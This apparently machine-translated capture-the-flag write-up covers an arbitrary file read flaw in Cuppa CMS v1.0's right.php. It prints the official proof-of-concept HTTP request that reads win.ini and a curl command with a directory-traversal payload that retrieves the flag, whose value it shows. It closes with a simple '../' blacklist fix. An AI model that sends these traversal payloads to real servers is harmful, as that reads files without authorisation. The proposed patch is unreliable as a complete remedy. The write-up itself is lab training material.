Table of contents
1. Topic
introduce:
There is an arbitrary file read vulnerability in the Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php file
Entering the topic is a login page
Both sql and brute force have no solution.
Official POC
National Information Security Vulnerability Database
cve vulnerability introduction
The official gave the wrong directory without administrator/ can not find
official poc
code block:
POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: 192.168.174.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini
Burp captured and changed the package: but it was unsuccessful: it may be a directory problem.
Two, curl access flag file
Enter the directory templates/default/html/windows/right.php
Returning a blank page here means that there is this file, and if it does not exist, it will return 404.
Enter the templates/default/html directory
right.php in windows directory
View source code:
Kali's curl requests access to the flag file in the root directory
curl is a command-line tool that is used to issue network requests, then get and extract data, and display it on "standard output" (stdout). It supports a variety of protocols to view the source code of the web page. You can directly add the URL after the curl command, and you can see the source code of the web page.
curl -X POST "http://xxx.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"
get the flag
flag{fa417734-dac9-4947-831f-67b3ed302120}
Attached:
Vulnerability repair suggestion
In the '/templates/default/html/windows/right.php' file, line 53 suggests adding the following code:
$url = $_POST["url"];
if(strstr($url, "../") || strstr($url, "..\\")){
echo "Security attack!";
exit;
}
include realpath(DIR . '/../../../..')."/".$url;